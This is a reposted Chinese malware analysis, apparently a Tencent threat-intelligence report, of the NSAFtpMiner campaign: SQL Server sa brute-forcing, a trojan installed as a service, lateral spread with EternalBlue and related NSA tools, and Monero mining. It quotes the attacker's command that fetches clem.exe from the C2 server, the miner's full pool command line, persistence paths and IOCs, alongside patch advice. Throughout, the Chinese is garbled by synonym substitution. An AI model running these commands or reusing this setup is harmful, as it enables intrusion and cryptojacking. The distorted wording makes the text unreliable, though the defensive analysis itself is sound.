精通NSA十八般兵器的NSAFtpMiner矿工来了,已有3万台电脑中招

0×1 概述

腾讯御见要挟情报中间近期发明黑客经由过程1433端口爆破入侵SQL Server办事器,再植入远程节制木马并安装为系统办事,然后使用远程节制木马进一步加载挖矿木马进行挖矿。随后,黑客还会下载NSA武器进击对象在内网中进击扩散,若进击成功,会继承在内网机械上安装该远程节制木马。

木马加载的进击模块险些应用了NSA武器库中的十八般武器:

Eternalblue(永恒之蓝)、Doubleplsar(双脉冲星)、EternalChampion(永恒冠军)、Eternalromance(永恒浪漫)、Esteemaudit(RDP破绽进击)等破绽进击对象均被用来进行内网进击,进击主进程冒充成“Ftp系统核心办事”,还会使用FTP功能进行内网文件更新。其进击内网机械后,植入远程节制木马,并继承从C2地址下载挖矿和进击模块,进行内网扩散感染。

根据以长进击特征,腾讯御见要挟情报中间将其命名为1433爆破手矿工(NSAFtpMiner)。最新监测数据统计注解,1433爆破手矿工(NSAFtpMiner)已累计感染约3万台电脑。

NSAFtpMiner进击流程

1433爆破手矿工(NSAFtpMiner)有如下特征:

1.使用密码字典爆破1433端口登录;

2.木马冒充成系统办事,COPY自身到c:\windows\svchost.exe,创建办事“Server Remote”;

3.使用NSA武器库对象包扫描入侵内网开放445/139端口的谋略机;

4.应用了NSA武器中的多个对象包Eternalblue(永恒之蓝)、Doubleplsar(双脉冲星)、EternalChampion(永恒冠军)、Eternalromance(永恒浪漫)、Esteemaudit(RDP破绽进击);

5.远程节制木马创建“FTP系统核心办事”,供给FTP办事,供内网其他被入侵的电脑进行病毒库更新;

6.下载挖矿法度榜样在局域网组网挖取门罗币;

7.累计感染近3万台电脑,广东、浙江、江苏中招电脑位于全国前三位。

令人吃惊的是,早在2017年3月方程式黑客组织就已公开NSA对象包,但在一年半之后,仍有大年夜量企业未修复这些高危破绽。1433爆破手矿工(NSAFtpMiner)此轮进击只是为了挖矿获利,而实际上,黑客进击成功,已得到系统完全节制权。偷取机密信息、使用中毒电脑进击其他电脑、在内网植入打单病毒彻底瘫痪收集等伟大年夜风险均有可能呈现。

腾讯御见要挟情报中间再次呼吁,企业网管应立即采取行动,对系统高危破绽进行修补。立即矫正Web办事器应用弱密码,以保护企业信息系统不被入侵破坏。

以下为具体的技巧阐发申报。

0×2 具体阐发

0×2.1 入侵

1433端口SQL Server默认端口,用于供SQL Server对外供给办事。黑客们使用sa弱口令,经由过程密码字典进行猜解爆破登录。因为一些治理员的安然意识懦弱,设置密码简单轻易猜解,导致黑客每每能轻松进入办事器。

黑客针对1433端口爆破成功后在受害机械履行敕令:

“C:\Windows\System32\WScript.exe” “C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe

将远程节制木马植入。

clem.exe运行后拷贝自身到C:\windows\svchost.exe,并创建办事“Server Remote”。

动态获取函数地址:

连接C2地址221.229.204.120:

发送数据:

接管数据:

根据远程敕令履行响应代码:

0×2.2 NSA武器进击

远程节制木马clem.exe接管指令下载NSA进击模块主法度榜样ru.exe,ru.exe运行后在C:\Program Files\Windowsd 开释72个子文件。

黑客进击时先关闭防火墙,然后启动Fileftp.exe扫描内网机械的445/139端口,假如端口处于打开状态则使用多个NSA武器对象(Eternalblue等)对目标机械进行进击。若进击成功,则根据不合系统版本在受害机械上履行payload(x86/x64.dll),x86/x64.dll履行后开释出runsum.exe并安装履行,runsum.exe功能同最初的远程节制模块clem.exe相同,接管指令下载挖矿模块和NSA进击模块进行挖矿进击和继承感染。

假如内网机械开放有445/139端口且未安装SMB破绽相关补丁(ms17-010),则很轻易造成批量感染。

[1] [2] [3]下一页

文件中包孕NSA武器中的Eternalblue(永恒之蓝)、Doubleplsar(双脉冲星)、EternalChampion(永恒冠军)、Eternalromance(永恒浪漫)、Esteemaudit(RDP破绽进击)。

Fileftp.exe冒充成“Ftp系统核心办事”。

主进程Fileftp.exe认真扫内网机械,调用进击模块进行进击。开始进击时先关闭防火墙。

创建线程扫描内网IP,检测445/139端口是否开启:

判断机械系统版本:

Fileftp.exe使用多个NSA武器对象针对内网机械445端口进行进击,假如进击成功,则在目标机械履行Payload(x86/x64.dll)。

Fileftp.exe使用多个NSA武器对象针对内网机械139端口进行进击,假如进击成功,则在目标机械履行Payload(x86/x64.dll)。

内置FTP办事供内网机械进行病毒文件更新。

应用kill.bat、Pkill.dll对进击进程进行清除。

0×2.3 Payload

木马使用NSA武器进行内网进击后植入的DllPayload(x86.dll/x64.dll)在受害机械上履行后,开释自身文件中的远程节制木马runsum.exe,并将其安装为办事“Server Remote”,等待远程C2指令从而下载挖矿和NSA武器模块。

x86/x64.dll创建文件C:\Windows\runsum.exe:

将自身文件中的PE数据写入runsum.exe:

启动runsum.exe:

runsum.exe与远程节制模块clem.exe相同,运行后拷贝自身到C:\Windows\svchost.exe并注册为办事“Server Remote”。

0×2.4 挖矿

远程节制木马clem.exe下载挖矿模块xxs.exe,xxs.exe运行后开释help.dll到C:\Windows\Fonts\sysIntl。

写注册表

HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WindowsIntl_Help\Parameters\ServiceDll

将C:\Windows\Fonts\sysIntl\help.dll安装为办事:

help.dll开释矿机法度榜样win1ogins.exe到以下目录:

C:\Windows\Help\

C:\Windows\PLA\system\

C:\Windows\Fonts\system(x64)\

C:\Windows\Fonts\system(x86)\

C:\Windwos\dell\

win1ogins.exe采纳开源挖矿法度榜样xmrig编译:

上一页[1] [2] [3]下一页

启动矿机法度榜样挖矿门罗币:

敕令行:

C:\Windows\Fonts\syshost\win1ogins.exe

-a cryptonight -o stratum+tcp://asia.cryptonight-hub.miningpoolhub.com:20580 -u ump_98k.run -p runssll -k –donate-level=1

矿池:

asia.cryptonight-hub.miningpoolhub.com

0×3 传播趋势

腾讯御见要挟情报中间监测数据显示,NSAFtpMiner进击从7月尾开始爆发,8月中旬达到高峰,进入9月后有所缓解。NSAFtpMiner累计已感染近三万台电脑,受影响最严重省份前三为广东、浙江、江苏。

0×4 安然建议

1.办事器应用安然的密码策略,应用高强度密码,切勿应用弱口令,防止黑客暴力破解。

2.手动安装“永恒之蓝”破绽补丁请造访以下页面:

https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

此中WinXP,Windows Server 2003用户请造访:

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

3.企业用户建议全网安装御点终端安然治理系统(https://s.tencent.com/product/yd/index.html)

御点终端安然治理系统具备终端杀毒统一管控、修复破绽统一管控,以及策略管控等全方位的安然治理功能,可赞助企业治理者周全懂得、治理企业内网安然状况、保护企业安然。

4.小我用户保举应用腾讯电脑管家,拦截此类病毒进击。

IOCs

C2:

221.229.204.120

矿池:

asia.cryptonight-hub.miningpoolhub.com

Md5:

f82fa69bfe0522163eb0cf8365497da2

f61e81eaf4a9ac9cd52010da3954c2a9

f0881d5a7f75389deba3eff3f4df09ac

f01f09fe90d0f810c44dce4e94785227

ee2d6e1d976a3a92fb1c2524278922ae

e53f9e6f1916103aab8703160ad130c0

e4ad4df4e41240587b4fe8bbcb32db15

e30d66be8ddf31f44bb66b8c3ea799ae

d76942a6e35f5c2122ed5c995e9ce071

1e927920a7902c333e32c7b1bafa6b62

d2fb01629fa2a994fbd1b18e475c9f23

d1aae806243cc0bedb83a22919a3a660

d0e288c7f4d17d78e962c7cf236cdace

c4ce49fa3668d2958905e59635d548cf

c24315b0585b852110977dacafe6c8c1

ba629216db6cf7c0c720054b0c9a13f3

b777086fd83d0bc1dccdc7c126b207d0

a539d27f33ef16e52430d3d2e92e9d5c

a05c7011ab464e6c353a057973f5a06e

9b5e0c6e903aabc27439aaf3d9e55171

9a5cec05e9c158cbc51cdc972693363d

9744f0000284c2807de0651c7e0d980a

8d3ffa58cb0dc684c9c1d059a154cf43

8c80dd97c37525927c1e549cb59bcbf3

8b0a4ce79f5ecdb17ad168e35db0d0f9

89b7dac7d9ce5b75b08f5d037edd3869

8969668746ae64ca002cc7289cd1c5da

838ceb02081ac27de43da56bec20fc76

83076104ae977d850d1e015704e5730a

7bf105e0b693d72c36bee1a05a73e5c0

770d0caa24d964ea7c04ff5daf290f08

6fe4544d00b77e0295e779e82d8f0fe5

6b7276e4aa7a1e50735d2f6923b40de4

6a065c2940cda0120655a78753627c4d

649b368c52de83e52474a20ce4f83425

5e8ecdc3e70e2ecb0893cbda2c18906f

5b72ccfa122e403919a613785779af49

5adcbe8bbba0f6e733550ce8a9762fa0

4ff94c163565a38a27cf997ad07b3d69

4803a7863da607333378b773b6a17f4c

46f7b320b13a4b618946042360215179

4420f8917dc320a78d2ef14136032f69

43aac72a9602ef53c5769f04e1be7386

3e89c56056e5525bf4d9e52b28fbbca7

3e5d06dc6e7890e1800cf24c9f599856

3c2fe2dbdf09cfa869344fdb53307cb2

31d696f93ec84e635c4560034340e171

30017e300c6d92e126bf92017c195c37

2f0a52ce4f445c6e656ecebbcaceade5

25ccfc16fc622218e037d8788b25ed40

320789f7e092eb8d32bce93d11790b71

7a0328e24348574b7efebd38b695e3f4

d50b756e8fd5769c435787c4ccfef048

0c56bf81d235a3b967dc1af76586f17c

上一页[1] [2] [3]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包